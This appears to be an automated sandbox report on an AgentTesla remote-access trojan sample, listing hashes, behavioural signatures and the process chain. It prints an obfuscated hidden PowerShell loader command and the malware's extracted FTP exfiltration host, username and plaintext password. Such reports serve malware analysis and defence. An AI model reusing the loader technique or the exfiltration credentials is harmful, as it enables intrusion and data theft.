Overview
overview
10Static
static
1Documenti ...ne.exe
windows7-x64
8Documenti ...ne.exe
windows10-2004-x64
10Magisterfo...ne.gor
windows7-x64
3Magisterfo...ne.gor
windows10-2004-x64
3Magisterfo...er.txt
windows7-x64
1Magisterfo...er.txt
windows10-2004-x64
1Magisterfo...gs.cat
windows7-x64
1Magisterfo...gs.cat
windows10-2004-x64
1Magisterfo...es.ps1
windows7-x64
3Magisterfo...es.ps1
windows10-2004-x64
8Magisterfo...st.dog
windows7-x64
3Magisterfo...st.dog
windows10-2004-x64
3Magisterfo...es.ste
windows7-x64
3Magisterfo...es.ste
windows10-2004-x64
3Udlaansbet...er.sme
windows7-x64
3Udlaansbet...er.sme
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-01-2025 11:08
Static task
static1
Behavioral task
behavioral1
Sample
Documenti di spedizione.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Documenti di spedizione.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Magisterforeninger24/Demarkationernes/lagnerne.gor
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Magisterforeninger24/Demarkationernes/lagnerne.gor
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Magisterforeninger24/Demarkationernes/selvhersker.txt
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
Magisterforeninger24/Demarkationernes/selvhersker.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Magisterforeninger24/Demarkationernes/skjaldedigtnings.cat
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Magisterforeninger24/Demarkationernes/skjaldedigtnings.cat
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Magisterforeninger24/Efterskrivendes.ps1
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
Magisterforeninger24/Efterskrivendes.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Magisterforeninger24/gypsologist.dog
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
Magisterforeninger24/gypsologist.dog
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
Magisterforeninger24/informationsproblemernes.ste
Resource
win7-20240729-en
Behavioral task
behavioral14
Sample
Magisterforeninger24/informationsproblemernes.ste
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
Udlaansbetingelser.sme
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
Udlaansbetingelser.sme
Resource
win10v2004-20241007-en
General
-
Target
Documenti di spedizione.exe
-
Size
777KB
-
MD5
424d1a3ddc69f3335da09d2300d6bafa
-
SHA1
d7a16c4fd81363f1ac839abef7de303605871277
-
SHA256
1517b2cad778c2f60c3e175797fbe180f9d869aad4b4ec22ea4e619c4f87ef63
-
SHA512
319df4c10dd606f1d116908055359010ea27d0b492ed4c5e2bcb3e7a647332d9a6f6eb33faf3fdd35a7404226110c235c32057335d7affb2cbfacebb54c3787c
-
SSDEEP
12288:wtsfn0E9XB0fPHsFgu6+0wfYTPPZn8fnd+23MsftvphBV7GWu:w2R90PM96+PfYTdRWMYJ6Wu
Malware Config
Extracted
Protocol: ftp- Host:
ftp.concaribe.com - Port:
21 - Username:
[email protected] - Password:
ro}UWgz#!38E
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.concaribe.com - Port:
21 - Username:
[email protected] - Password:
ro}UWgz#!38E
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2020 powershell.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 25 1184 msiexec.exe 35 1184 msiexec.exe 38 1184 msiexec.exe 39 1184 msiexec.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 api.ipify.org 35 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1184 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2020 powershell.exe 1184 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Fonts\qualitied\frail.ini Documenti di spedizione.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Documenti di spedizione.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 1184 msiexec.exe 1184 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2020 powershell.exe Token: SeIncreaseQuotaPrivilege 2020 powershell.exe Token: SeSecurityPrivilege 2020 powershell.exe Token: SeTakeOwnershipPrivilege 2020 powershell.exe Token: SeLoadDriverPrivilege 2020 powershell.exe Token: SeSystemProfilePrivilege 2020 powershell.exe Token: SeSystemtimePrivilege 2020 powershell.exe Token: SeProfSingleProcessPrivilege 2020 powershell.exe Token: SeIncBasePriorityPrivilege 2020 powershell.exe Token: SeCreatePagefilePrivilege 2020 powershell.exe Token: SeBackupPrivilege 2020 powershell.exe Token: SeRestorePrivilege 2020 powershell.exe Token: SeShutdownPrivilege 2020 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeSystemEnvironmentPrivilege 2020 powershell.exe Token: SeRemoteShutdownPrivilege 2020 powershell.exe Token: SeUndockPrivilege 2020 powershell.exe Token: SeManageVolumePrivilege 2020 powershell.exe Token: 33 2020 powershell.exe Token: 34 2020 powershell.exe Token: 35 2020 powershell.exe Token: 36 2020 powershell.exe Token: SeDebugPrivilege 1184 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 220 wrote to memory of 2020 220 Documenti di spedizione.exe 83 PID 220 wrote to memory of 2020 220 Documenti di spedizione.exe 83 PID 220 wrote to memory of 2020 220 Documenti di spedizione.exe 83 PID 2020 wrote to memory of 1184 2020 powershell.exe 97 PID 2020 wrote to memory of 1184 2020 powershell.exe 97 PID 2020 wrote to memory of 1184 2020 powershell.exe 97 PID 2020 wrote to memory of 1184 2020 powershell.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\Documenti di spedizione.exe"C:\Users\Admin\AppData\Local\Temp\Documenti di spedizione.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Sm=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\Hyperboreal\Radiospredningen\Magisterforeninger24\Efterskrivendes.Ful';$Eliteenhed=$Sm.SubString(33343,3);.$Eliteenhed($Sm)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Hyperboreal\Radiospredningen\Magisterforeninger24\Efterskrivendes.Ful
Filesize55KB
MD50528a9bc5149e49e3c154c29c0230719
SHA13f9370061cc387d5adad587abacc6cb56b873a56
SHA2563176ee8d9e193c87855dca4c1a53a3f0cc17d1d64cd5ef3df52f295927925c8c
SHA512ebb50afbf89489ed96a9978d40e61d4150399ad464665313906f414ffe4bc0e81d321765593f881a34e5957d0662d14021e4a52a5fba870768867483ba2bb3d3
-
Filesize
352KB
MD5365192963e84961bb4ad8095785fc17a
SHA12fd4a5e63cf6176cbdb3decc6dff9a1b8fd8d649
SHA256e4475458e2580de7bf379f70dbd69edd2424fef1e155bce84a1bda16d70230b3
SHA512c39a3e96cbdc4356dfd4ba9e30b078a3c8960268225e548b0e60beebff8f76d8f5e2df5dd2799d1cd4d8862967d15ef5d53a4122edacae4148be28c8bfa2855f